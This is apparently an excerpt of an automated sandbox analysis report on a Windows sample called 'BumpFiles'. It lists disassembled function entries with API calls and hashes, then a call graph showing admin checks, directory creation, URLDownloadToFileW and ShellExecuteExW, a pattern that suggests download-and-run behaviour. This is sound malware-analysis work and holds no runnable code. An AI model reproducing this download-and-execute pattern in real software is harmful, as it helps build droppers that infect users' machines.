                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                    • String ID: t5B
                                                                    • API String ID: 3490077880-2522545044
                                                                    • Opcode ID: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
                                                                    • Instruction ID: 3e064d22227ce83d323fd635ef74908ee7d5fe006525e65d3825cc916af52ec8
                                                                    • Opcode Fuzzy Hash: dee015889ac32e6df2b25993643341ab4869c9cb8df1deab5bfee0089377f4bb
                                                                    • Instruction Fuzzy Hash: A7314C34A007419BDB31AB7AA88471B7BE1BB46324F14493FE485A62D3D77CEC84CB19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CBC9
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC27
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CC84
                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CCB7
                                                                      • Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CC35), ref: 0040CB8B
                                                                      • Part of subcall function 0040CB74: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CC35), ref: 0040CBA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                    • String ID:
                                                                    • API String ID: 2255706666-0
                                                                    • Opcode ID: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
                                                                    • Instruction ID: 41e4a82156dcdbea47aa592af73f03f4b3f6d906c0d9ea18ea200e93a0dd79e9
                                                                    • Opcode Fuzzy Hash: 72f7c58ec07244d9a8b6590b8c99882c83141c37e6ee73b2fa0aef0b244a9c62
                                                                    • Instruction Fuzzy Hash: 0A316D70E0421ADBDB10DBA9C8C5AAEB3B5EF05305F10427AE519EB291DB789A04CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetWindow.USER32(?,00000004), ref: 005EC9FA
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005ECA17
                                                                    • GetCurrentProcessId.KERNEL32(?,00000004), ref: 005ECA23
                                                                    • IsWindowVisible.USER32(?), ref: 005ECA7D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Process$CurrentThreadVisible
                                                                    • String ID:
                                                                    • API String ID: 3926708836-0
                                                                    • Opcode ID: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
                                                                    • Instruction ID: 8268e75e0adbed2169e79767f9ce143fa46dc78cab4c363f5557c18a9004b086
                                                                    • Opcode Fuzzy Hash: ae48674ec502b5c25bc1aae18e8a90669d7f96e4dd4d16030504c316246d3a25
                                                                    • Instruction Fuzzy Hash: 9A31BC71600B49DFDB20DFAAD8C5BAA7BA5BB48304F9441B6E815D7352EB30FD418B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetActiveWindow.USER32(?,?,006551D0,005EE2DC), ref: 005ED662
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ActiveWindow
                                                                    • String ID:
                                                                    • API String ID: 2558294473-0
                                                                    • Opcode ID: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
                                                                    • Instruction ID: 316ea7ef422e3561d401b094dd8cef2e267661bcd36d655bf6b1583c726e49ee
                                                                    • Opcode Fuzzy Hash: fb2bbe578685c1848e64e5aef4fcec5335ddfaafe7add0855c05a9fda4d45933
                                                                    • Instruction Fuzzy Hash: 9C310D706042C19BDB18FF2AC8C9B9A3BA6BF44304F1440B5BD849F29BCA74DC85C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EnumWindows.USER32(005EC6D4), ref: 005EC7C5
                                                                    • GetWindow.USER32(00000003,00000003), ref: 005EC7DD
                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 005EC7EA
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 005EC829
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnumLongWindows
                                                                    • String ID:
                                                                    • API String ID: 4191631535-0
                                                                    • Opcode ID: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
                                                                    • Instruction ID: 6cfa09aa32f089a1f13344452882ebc562bbad27a0c324552ed6f96263435584
                                                                    • Opcode Fuzzy Hash: c52ffe457daee2d391e7c8c1ae88a74a5a0506567ac3227abf4ff07a4df4949a
                                                                    • Instruction Fuzzy Hash: 6811A030608750AFDB10AA1E8885FDA7A94AB46724F184168FCD8AB1D2C7709C82CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00532161
                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,005EFD71,?,?,?,00000001,005EDF4B), ref: 0053216A
                                                                    • GlobalFindAtomW.KERNEL32(00000000), ref: 0053217F
                                                                    • GetPropW.USER32(00000000,00000000), ref: 00532196
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                    • String ID:
                                                                    • API String ID: 2582817389-0
                                                                    • Opcode ID: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
                                                                    • Instruction ID: c7d3ec914ef7cc7fd85d71469748cdc3bb9cf033b4ebf6ec3ea160049ca614c5
                                                                    • Opcode Fuzzy Hash: 536c3aff569af4baeae921204661b15b761a0ff35ef730b8b780b24beb53bddb
                                                                    • Instruction Fuzzy Hash: 83F06C72300B12A6DB20B7F67DC58AB278C9D947A5F411936FA41D7141D55CCC41C3F5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 0040927A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID: 8Q@
                                                                    • API String ID: 3192549508-4538559
                                                                    • Opcode ID: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
                                                                    • Instruction ID: 5c24eb5a0224f0d0217dee170c32e69bb12a0157d27a806c2dea3ea9b843178a
                                                                    • Opcode Fuzzy Hash: 0ee4e09c54aa6e425cbc97756c8e7cad0d7145fca06ddd3aa2fd3d8f3229600e
                                                                    • Instruction Fuzzy Hash: 5A41BF74204201AFD720DF14D884B6BB7E6EB89314F5449BEE844AB392C738EC81CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 004090E6
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000907C), ref: 00409123
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID: 8Q@
                                                                    • API String ID: 3192549508-4538559
                                                                    • Opcode ID: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
                                                                    • Instruction ID: 3f5640ce620659ae70755be411fdbb9ab37924059e896462e0bf5bb31e75aaa3
                                                                    • Opcode Fuzzy Hash: d8bc75a49be3868f3870258a1c84696a1119bf996198daecdf9d3cda867161b8
                                                                    • Instruction Fuzzy Hash: D0316174704201AFF320DB24C988F27B7E6EB89714F55856EF5449B392C779EC80CA69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetACP.KERNEL32(00422164,00000001), ref: 00431C18
                                                                    • GetCPInfo.KERNEL32(00431CFC,?,00422164,00000001), ref: 00431C39
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID: dB
                                                                    • API String ID: 1807457897-4186906907
                                                                    • Opcode ID: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
                                                                    • Instruction ID: e5a0a06e1b2316e04b0ed604c2c2d8d31d3c5bbf7ca71c3f0e9c3581ed2bfd2c
                                                                    • Opcode Fuzzy Hash: 65a2383da8e2ee5cccfb8637ae2fbe26abb7a3fb1eedf3c9967e081fedec5aae
                                                                    • Instruction Fuzzy Hash: 460149716417048FC720EF6AE941997B7E8AF08354B00993FFC95C7351EB39E8008BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004,004C0A6C,00000000), ref: 0042932C
                                                                    • LocalFree.KERNEL32(00000001,00429385,00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,j$L,?,004C2803,D*L,00000004), ref: 00429378
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3855596055.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856957335.0000000000646000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3856999369.000000000064B000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857029518.000000000064D000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857067852.0000000000654000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857104267.0000000000658000.00000008.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857141551.000000000065A000.00000004.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065B000.00000002.00000001.01000000.00000009.sdmp
                                                                    • Associated: 00000004.00000002.3857178702.000000000065D000.00000002.00000001.01000000.00000009.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FormatFreeLocalMessage
                                                                    • String ID: j$L
                                                                    • API String ID: 1427518018-881032185
                                                                    • Opcode ID: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
                                                                    • Instruction ID: a4427651f3d97b25f843a57d3278f1a4ed8704c5c77d1cef0145a63058bfea89
                                                                    • Opcode Fuzzy Hash: 4368be9f9cc55daf07c8490309becffcaf4b20e1df3bbf12405840c18cc40611
                                                                    • Instruction Fuzzy Hash: ED012630744214AEE728D695AC12FBF369EE7CCB00FE0406BB900D62C0DA7C9D108268
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:12.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1517
                                                                    Total number of Limit Nodes:27
11422 40e750 11421->11422 11423 40e758 11421->11423 11433 40e5d0 11422->11433 11425 40e474 13 API calls 11423->11425 11427 40e780 11425->11427 11426 40e7c3 11430 40e4dc 2 API calls 11426->11430 11427->11426 11444 40e53c 11427->11444 11432 40e7e4 11430->11432 11432->11418 11434 40e685 11433->11434 11435 40e5e9 11433->11435 11434->11423 11438 40e5fa 11435->11438 11455 408850 11435->11455 11437 4089ac 13 API calls 11442 40e629 11437->11442 11438->11437 11439 40e658 11440 408b44 2 API calls 11439->11440 11443 40e67d 11440->11443 11442->11439 11459 40e460 11442->11459 11443->11423 11445 40e544 11444->11445 11446 40e54d 11445->11446 11468 40e00c 11445->11468 11448 40e2f0 11446->11448 11449 40e30a 11448->11449 11450 40e313 11449->11450 11452 40e32d 11449->11452 11472 40c0c0 11450->11472 11453 40e328 11452->11453 11454 40c0c0 25 API calls 11452->11454 11453->11426 11454->11453 11456 40885e 11455->11456 11457 408859 11455->11457 11456->11438 11462 408724 GetModuleHandleW GetProcAddress 11457->11462 11460 408850 5 API calls 11459->11460 11461 40e468 11460->11461 11461->11442 11463 40874c GetLogicalProcessorInformation 11462->11463 11467 408794 11462->11467 11464 40875b GetLastError 11463->11464 11463->11467 11465 408765 11464->11465 11464->11467 11466 40876d GetLogicalProcessorInformation 11465->11466 11466->11467 11467->11456 11469 40e017 11468->11469 11470 408850 5 API calls 11469->11470 11471 40e01e 11470->11471 11471->11446 11475 40be18 11472->11475 11474 40c0ca 11474->11453 11476 40be56 11475->11476 11477 40be3b 11475->11477 11478 40bec4 11476->11478 11480 40bf91 11476->11480 11477->11474 11485 40bf2b 11478->11485 11486 40bdd4 11478->11486 11480->11485 11503 40b8f8 11480->11503 11481 40be18 25 API calls 11481->11485 11483 40bedc 11483->11485 11496 40b7d0 11483->11496 11485->11477 11485->11481 11487 41028c 4 API calls 11486->11487 11488 40bddd 11487->11488 11489 40bdf3 11488->11489 11490 40bde5 11488->11490 11493 41028c 4 API calls 11489->11493 11491 41028c 4 API calls 
11490->11491 11492 40bdea 11491->11492 11492->11483 11494 40be01 11493->11494 11495 41028c 4 API calls 11494->11495 11495->11492 11497 40b7ec 11496->11497 11498 40b830 11496->11498 11497->11498 11499 40b86a 11497->11499 11502 40b899 11497->11502 11498->11485 11499->11498 11500 40b7d0 25 API calls 11499->11500 11500->11499 11502->11498 11507 40b4f4 11502->11507 11504 40b901 11503->11504 11505 40b909 11503->11505 11506 40b6b8 25 API calls 11504->11506 11505->11485 11506->11505 11508 40b693 11507->11508 11509 40b517 11507->11509 11508->11502 11509->11508 11510 40b7d0 25 API calls 11509->11510 11511 40b4f4 25 API calls 11509->11511 11512 40eb8c 25 API calls 11509->11512 11513 40eb60 14 API calls 11509->11513 11510->11509 11511->11509 11512->11509 11513->11509 11520 4b3d70 11514->11520 11529 4b4c14 11517->11529 11528 4b3d95 11520->11528 11521 42a97c 46 API calls 11523 4b3dad 11521->11523 11522 4b3d6c 11522->11019 11524 409410 4 API calls 11523->11524 11525 4b3db2 11524->11525 11525->11522 11526 42a97c 46 API calls 11525->11526 11527 409410 4 API calls 11525->11527 11526->11525 11527->11525 11528->11521 11528->11525 11530 4b4c37 11529->11530 11531 42a97c 46 API calls 11530->11531 11535 4b4c54 11530->11535 11533 4b4c4f 11531->11533 11532 4b4c10 11532->11019 11534 409410 4 API calls 11533->11534 11534->11535 11535->11532 11536 42a97c 46 API calls 11535->11536 11537 409410 4 API calls 11535->11537 11536->11535 11537->11535 11539 409df0 11538->11539 11540 409de2 SysFreeString 11538->11540 11539->11027 11540->11539 11542 409e5a 11541->11542 11543 409e60 SysFreeString 11542->11543 11544 409e72 11542->11544 11543->11542 11544->11027 11545 645850 11548 4107f8 11545->11548 11547 645860 11550 410803 11548->11550 11552 409778 11550->11552 11553 409787 11552->11553 11554 40978c GetCurrentThreadId 11552->11554 11553->11554 11555 4097c2 11554->11555 11556 409ac4 11555->11556 11557 409835 11555->11557 11559 409ae0 11556->11559 11560 409af1 11556->11560 11571 40970c 11557->11571 11575 
409a2c 11559->11575 11562 409afa GetCurrentThreadId 11560->11562 11565 409b07 11560->11565 11562->11565 11564 409aea 11564->11560 11566 406f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 11565->11566 11567 409b97 FreeLibrary 11565->11567 11568 409bbf 11565->11568 11566->11565 11567->11565 11569 409bc8 11568->11569 11570 409bce ExitProcess 11568->11570 11569->11570 11572 409754 11571->11572 11573 40971c 11571->11573 11572->11547 11573->11572 11581 40f134 GetSystemInfo 11573->11581 11576 409a93 11575->11576 11577 409a36 GetStdHandle WriteFile 11575->11577 11576->11564 11582 40a5a8 11577->11582 11580 409a83 GetStdHandle WriteFile 11580->11564 11581->11573 11583 40a5ae 11582->11583 11583->11580 11584 405ee4 11585 405ef4 11584->11585 11586 405f7c 11584->11586 11587 405f01 11585->11587 11588 405f38 11585->11588 11589 405f85 11586->11589 11590 40581c 11586->11590 11593 405f0c 11587->11593 11596 405968 10 API calls 11587->11596 11592 405968 10 API calls 11588->11592 11591 405f9d 11589->11591 11600 4060ac 11589->11600 11594 4061f7 11590->11594 11595 405840 VirtualQuery 11590->11595 11599 40591f 11590->11599 11601 406084 11591->11601 11608 405fc0 11591->11608 11616 405fa4 11591->11616 11602 405f4f 11592->11602 11609 4058e7 11595->11609 11610 405879 11595->11610 11614 405f19 11596->11614 11597 405968 10 API calls 11618 4061c0 11597->11618 11598 40591d 11599->11598 11604 405968 10 API calls 11599->11604 11607 406110 11600->11607 11612 4060e8 Sleep 11600->11612 11624 406129 11600->11624 11606 405968 10 API calls 11601->11606 11619 405cec 10 API calls 11602->11619 11625 405f75 11602->11625 11626 405936 11604->11626 11605 405f31 11628 40608d 11606->11628 11607->11597 11607->11624 11613 406000 Sleep 11608->11613 11608->11616 11636 405968 11609->11636 11610->11609 11622 4058a4 11610->11622 11623 4058a6 VirtualAlloc 11610->11623 11612->11607 11620 406102 Sleep 11612->11620 11613->11616 11621 406018 Sleep 11613->11621 11614->11605 11615 405cec 10 API calls 11614->11615 
11615->11605 11617 4060a5 11618->11624 11629 405cec 10 API calls 11618->11629 11619->11625 11620->11600 11621->11608 11622->11623 11623->11609 11627 4058bc VirtualAlloc 11623->11627 11626->11598 11634 405cec 10 API calls 11626->11634 11627->11609 11630 4058d2 11627->11630 11628->11617 11632 405cec 10 API calls 11628->11632 11633 4061e4 11629->11633 11630->11598 11631 4058ee 11631->11598 11660 405cec 11631->11660 11632->11617 11634->11598 11637 405980 11636->11637 11638 405bc8 11636->11638 11649 405992 11637->11649 11651 405a1d Sleep 11637->11651 11639 405ce0 11638->11639 11640 405b8c 11638->11640 11642 405714 VirtualAlloc 11639->11642 11643 405ce9 11639->11643 11646 405ba6 Sleep 11640->11646 11652 405be6 11640->11652 11641 4059a1 11641->11631 11644 40574f 11642->11644 11645 40573f 11642->11645 11643->11631 11644->11631 11680 4056c8 11645->11680 11650 405bbc Sleep 11646->11650 11646->11652 11648 405a80 11659 405a8c 11648->11659 11685 40564c 11648->11685 11649->11641 11649->11648 11653 405a61 Sleep 11649->11653 11650->11640 11651->11649 11655 405a33 Sleep 11651->11655 11654 40564c VirtualAlloc 11652->11654 11657 405c04 11652->11657 11653->11648 11656 405a77 Sleep 11653->11656 11654->11657 11655->11637 11656->11649 11657->11631 11659->11631 11661 405d01 11660->11661 11662 405de4 11660->11662 11663 405d07 11661->11663 11668 405d7e Sleep 11661->11668 11662->11663 11664 405778 11662->11664 11665 405d10 11663->11665 11671 405dc2 Sleep 11663->11671 11678 405df9 11663->11678 11666 405ede 11664->11666 11667 4056c8 2 API calls 11664->11667 11665->11598 11666->11598 11669 405789 11667->11669 11668->11663 11670 405d98 Sleep 11668->11670 11672 4057b9 11669->11672 11673 40579f VirtualFree 11669->11673 11670->11661 11674 405dd8 Sleep 11671->11674 11671->11678 11675 4057b0 11672->11675 11676 4057c2 VirtualQuery VirtualFree 11672->11676 11673->11675 11674->11663 11675->11598 11676->11672 11676->11675 11677 405e78 VirtualFree 11677->11598 11678->11677 11679 405e1c 11678->11679 
11679->11598 11681 405710 11680->11681 11682 4056d1 11680->11682 11681->11644 11682->11681 11683 4056dc Sleep 11682->11683 11683->11681 11684 4056f6 Sleep 11683->11684 11684->11682 11689 4055e0 11685->11689 11687 405655 VirtualAlloc 11688 40566c 11687->11688 11688->11659 11690 405580 11689->11690 11690->11687 11691 60cb84 11692 60cb97 11691->11692 11693 42a97c 46 API calls 11692->11693 11696 60cbb9 11692->11696 11694 60cbb4 11693->11694 11695 409410 4 API calls 11694->11695 11695->11696 11697 40c0c0 25 API calls 11696->11697 11698 60cc9d 11697->11698 11699 40c0c0 25 API calls 11698->11699 11703 60ccde 11698->11703 11699->11703 11700 40b08c 16 API calls 11701 60cd1b 11700->11701 11702 43d0d8 50 API calls 11701->11702 11704 60cd26 11702->11704 11703->11700 11705 40b34c 25 API calls 11704->11705 11706 60cd43 11705->11706 11711 60de28 11706->11711 11709 40b08c 16 API calls 11710 60cd8c 11709->11710 11712 60de3b 11711->11712 11713 60de63 11712->11713 11715 42a97c 46 API calls 11712->11715 11714 40b34c 25 API calls 11713->11714 11716 60cd5b 11714->11716 11717 60de5e 11715->11717 11716->11709 11718 409410 4 API calls 11717->11718 11718->11713 11719 410c34 11720 410c5a 11719->11720 11721 410cdb 11719->11721 11720->11721 11723 410844 11720->11723 11724 41086f 11723->11724 11725 4108e0 RaiseException 11724->11725 11726 410908 11724->11726 11742 410975 11725->11742 11727 4109a8 11726->11727 11728 41099d LoadLibraryA 11726->11728 11732 410a3e 11726->11732 11726->11742 11730 4109f7 11727->11730 11731 4109ac GetLastError 11727->11731 11728->11727 11729 410aa7 11734 410aab GetLastError 11729->11734 11729->11742 11739 410a05 11730->11739 11740 410a38 FreeLibrary 11730->11740 11735 4109bd 11731->11735 11732->11729 11733 410a9b GetProcAddress 11732->11733 11732->11742 11733->11729 11736 410abc 11734->11736 11735->11730 11738 4109cf RaiseException 11735->11738 11737 410ace RaiseException 11736->11737 11736->11742 11737->11742 11738->11742 11739->11732 11741 410a0b LocalAlloc 
11739->11741 11740->11732 11741->11732 11743 410a1b 11741->11743 11742->11720 11743->11732 11744 633404 IsUserAnAdmin 11745 633485 11744->11745 11749 63342d 11744->11749 11773 633718 11745->11773 11747 63348f 11748 63349d GetMessageW 11747->11748 11750 633491 TranslateMessage DispatchMessageW 11748->11750 11751 6334ad 11748->11751 11749->11748 11752 424f1c 6 API calls 11749->11752 11750->11748 11753 63344b 11752->11753 11753->11748 11754 4258ec CreateDirectoryW 11753->11754 11755 633459 11754->11755 11760 63534c 11755->11760 11757 633471 11764 633a38 11757->11764 11759 633483 11759->11748 11761 635360 11760->11761 11788 635b3c 11761->11788 11763 635399 11763->11757 11765 633a4c 11764->11765 11766 633a5c Sleep 11765->11766 11767 633a80 11766->11767 11768 633a89 URLDownloadToFileW 11767->11768 11769 633aa5 11768->11769 11848 639740 11769->11848 11771 633ac1 Sleep 11772 633ae5 11771->11772 11772->11759 11774 633759 11773->11774 12262 5eeaf0 11774->12262 11776 633782 11777 5eeaf0 2 API calls 11776->11777 11778 6337a4 11777->11778 11779 6337b7 ShellExecuteExW 11778->11779 11780 6337cb WaitForSingleObject 11779->11780 11781 63381c 11779->11781 11782 6337e4 MsgWaitForMultipleObjects 11780->11782 11783 633718 130 API calls 11781->11783 11784 6337d8 11782->11784 11785 6337fd GetExitCodeProcess CloseHandle 11782->11785 11787 633826 11783->11787 12265 5edfb8 11784->12265 11785->11787 11787->11747 11792 635b6c 11788->11792 11789 635bfd 11796 40eefc 11789->11796 11791 635c66 11794 409ddc SysFreeString 11791->11794 11792->11789 11812 4246d0 11792->11812 11795 635c86 11794->11795 11795->11763 11797 409ddc SysFreeString 11796->11797 11798 40ef24 11797->11798 11799 40ef7f 11798->11799 11816 40a800 11798->11816 11801 409ddc SysFreeString 11799->11801 11802 40ef94 11801->11802 11802->11791 11803 40ef3f 11822 40ed58 11803->11822 11806 40ef6c 11809 409ddc SysFreeString 11806->11809 11807 40ef5f 11808 40a800 4 API calls 11807->11808 11810 40ef6a 11808->11810 11809->11810 11811 40a1e8 2 
